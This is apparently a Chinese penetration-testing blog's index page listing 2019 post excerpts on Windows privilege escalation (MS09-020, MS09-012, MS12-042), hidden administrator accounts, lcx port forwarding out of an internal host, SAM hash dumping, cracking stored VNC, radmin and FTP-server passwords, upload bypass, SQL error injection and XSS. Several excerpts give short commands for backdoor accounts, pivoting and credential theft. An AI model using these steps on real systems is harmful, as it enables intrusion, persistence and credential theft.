上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 18 下一页
2019年5月30日
创建超级隐藏用户
摘要: 1.先通过命令创建隐藏账户 net user test$ 123.com /add 在net user 发现看不到用户 但是 在用户组是可以看到的 先把加入管理员组在禁用 我们可以把用户命名成上面一样的用户名 都是禁用状态 可以迷惑管理员 2.复制admin权限 打开注册表 打开注册表编辑器,点击: 阅读全文
posted @ 2019-05-30 22:30 紅人 阅读(680) 评论(0) 推荐(1) 编辑
lcx 内网转发
摘要: 把放置到已经控制的内网主机 执行 内网主机输入命令lcx.exe -slave 外网ip 外网端口 内网ip 内网端口lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389 外网主机输入命令lcx.exe -listen 2222 3388 打开 mstsc ip 阅读全文
posted @ 2019-05-30 13:57 紅人 阅读(174) 评论(0) 推荐(0) 编辑
2019年5月27日
MS09-020 iis6.0提权
摘要: 漏洞编号:MS09-020 披露日期: 2009/6/9 受影响的操作系统:Windows 2003 x64 sp1 sp2;XP; 测试系统:windows 2003 x64 上传 执行 iis6.0.exe "net user temp 123.com /add" net user 阅读全文
posted @ 2019-05-27 14:00 紅人 阅读(619) 评论(0) 推荐(0) 编辑
MS09-012 PR提权
摘要: 漏洞编号:MS09-012 披露日期: 2009/4/14 受影响的操作系统:Windows 2008 x64 x86;XP;Server 2003 sp1 sp2; 测试系统:windows 2003 x86 上传到有执行的权限的目录 在大马上运行 创建成功 阅读全文
posted @ 2019-05-27 13:33 紅人 阅读(719) 评论(0) 推荐(0) 编辑
2019年5月26日
MS12-042 用户态调度机制特权提升漏洞
摘要: 漏洞编号:MS12-042 披露日期: 2012/6/12 受影响的操作系统:Windows 2000;XP;Server 2003;windows 7;Server 2008; 测试系统:windows 7 x64 利用网上现有的提权工具 测试 运行test.exe 列出进程id y也可以直接调出 阅读全文
posted @ 2019-05-26 18:14 紅人 阅读(461) 评论(0) 推荐(0) 编辑
提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享
摘要: 先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数 阅读全文
posted @ 2019-05-26 11:28 紅人 阅读(2073) 评论(1) 推荐(1) 编辑
2019年5月21日
windows 抓hash获取管理员密码
摘要: webshell 找能执行权限的目录上传 C:\Windows\System32\config\sam 内有windows 密码 利用工具把密码抓出来 samcopy 直接抓取 GetHASHES.exe $Local 返回当前系统所有的用户的哈希 pwdump7.exe 自动抓取哈希 都是用cmd 阅读全文
posted @ 2019-05-21 12:19 紅人 阅读(2434) 评论(0) 推荐(0) 编辑
第三方应用 flashfxp,filezilla提权
摘要: filezilla 提权 filezilla 开源的ftp服务器 默认监听14147端口 默认安装目录下有个敏感文件 filezillaserver.xml(包含用户信息) filezillaserver interface.xml(包含了管理信息) 提权思路: 下载两个文件拿到密码 配置端口转发, 阅读全文
posted @ 2019-05-21 10:16 紅人 阅读(428) 评论(2) 推荐(0) 编辑
2019年5月20日
第三方软件 G6ftp提权
摘要: 步骤 1.下载配置文件 将administrator 2.利用lcx 端口转发 默认只允许本机连接 3.lcx.exe -tran 8027 127.0.0.1 8021 4.使用客户端以管理员用户登录 5.创建用户并权限设置和执行批处理文件 6.上传批处理 7.创建普通用户登录ftp 8.执行命令 阅读全文
posted @ 2019-05-20 09:15 紅人 阅读(684) 评论(0) 推荐(0) 编辑
第三方软件 vnc提权
摘要: 通过读取注册表十进制数 将得出的十进制数去掉第一个数其他转换成16进制 破解16进制数得到密码 vncx.exe -W 回车 输入16进制数 连接vnc 读取 vncx4.exe -w 8个数 自动破解密码 让后工具连接 阅读全文
posted @ 2019-05-20 08:51 紅人 阅读(418) 评论(0) 推荐(0) 编辑
第三方软件 radmin提权
摘要: 一款远控工具 端口扫描 4899 端口 上传 radmin.asp 木马读取 radmin的加密密文 下载radmin工具连接 阅读全文
posted @ 2019-05-20 08:27 紅人 阅读(714) 评论(0) 推荐(0) 编辑
第三方软件 pcanywhere提权
摘要: pcanywhere 是一个远程管理软件 1.访问pcanywhere默认安装目录 访问 下载打开 利用破解工具直接 选择刚刚下载的软件 点破解 拿到用户密码后去百度下载客户端让后连接 阅读全文
posted @ 2019-05-20 08:19 紅人 阅读(597) 评论(0) 推荐(0) 编辑
2019年5月19日
windows 系统对应的内核版本和自带 iis 版本
摘要: Windows 10 10.0* Windows Server 2016 10.0* Windows 8.1 6.3* Windows Server 2012 R2 6.3* Windows 8 6.2 Windows Server 2012 6.2 Windows 7 6.1 Windows Se 阅读全文
posted @ 2019-05-19 18:25 紅人 阅读(2286) 评论(0) 推荐(0) 编辑
2019年5月17日
【Windows漏洞分析合集】
摘要: CVE-2022 ... CVE-2021 ... CVE-2020 CVE-2020-1510❤win32k越界读写 CVE-2020-1247❤win32k越界读写 CVE-2020-0887❤win32k释放重引用 CVE-2019 CVE-2019-1286❤win32k空指针引用 CVE- 阅读全文
posted @ 2019-05-17 16:44 紅人 阅读(1796) 评论(0) 推荐(2) 编辑
2019年5月16日
文件上传绕过(旧)
摘要: 1.js 验证 修改js 2.后缀名黑名单 比如: $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp 阅读全文
posted @ 2019-05-16 20:40 紅人 阅读(625) 评论(0) 推荐(0) 编辑
网站信息收集
摘要: ip信息收集 http://whois.chinaz.com/ Whois查询 http://tool.chinaz.com/ 站长工具 https://dns.aizhan.com/ 爱站网 ping检测 ip反查域 https://x.threatbook.cn/ 微步在线 https://to 阅读全文
posted @ 2019-05-16 17:03 紅人 阅读(445) 评论(0) 推荐(0) 编辑
google hack 语法
摘要: google hack a b c 自动对词进行拆分匹配 拆分标准 空格 "a b c " 把a b c 当成一个整体去查 " a*b" *通配符 里面是一个或者多个 以a开头 b结尾 "ab" -c 找到ab 不包含c a and b 包含a和b "ab"(c|d) ab中可能包含c或者d int 阅读全文
posted @ 2019-05-16 17:02 紅人 阅读(254) 评论(0) 推荐(0) 编辑
xss姿势利用
摘要: 1.定位页面可以出现xss的位置 可能会出现联合点利用 一个页面多个存储位置或者一个页面多个参数联合利用 例如输入xss 查看页面源码页面里有多个xss 或者多个参数显示 可以利用 需要注意的是有的是js动态加载标签 或者iframe嵌套 和框架嵌套 需要去审查元素 如果xss位置在js 可以直接利 阅读全文
posted @ 2019-05-16 16:56 紅人 阅读(730) 评论(0) 推荐(0) 编辑
2019年5月1日
MS08-067 远程执行代码 漏洞复现
摘要: 漏洞编号:MS08-067 披露日期: 2008/10/22 受影响的操作系统:Windows 2000;XP;Server 2003;Server 2008; 目标系统 Microsoft(R) Windows(R) Server 2003, Enterprise Edition 使用工具meta 阅读全文
posted @ 2019-05-01 15:04 紅人 阅读(2171) 评论(0) 推荐(0) 编辑
2019年4月30日
mysql 二十余种报错注入姿势
摘要: 1.floor() floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key select * from users where id=1 OR+1e0GROUP BY+CONCAT_WS(0x3a,VERSION(),FL 阅读全文
posted @ 2019-04-30 10:47 紅人 阅读(2674) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 18 下一页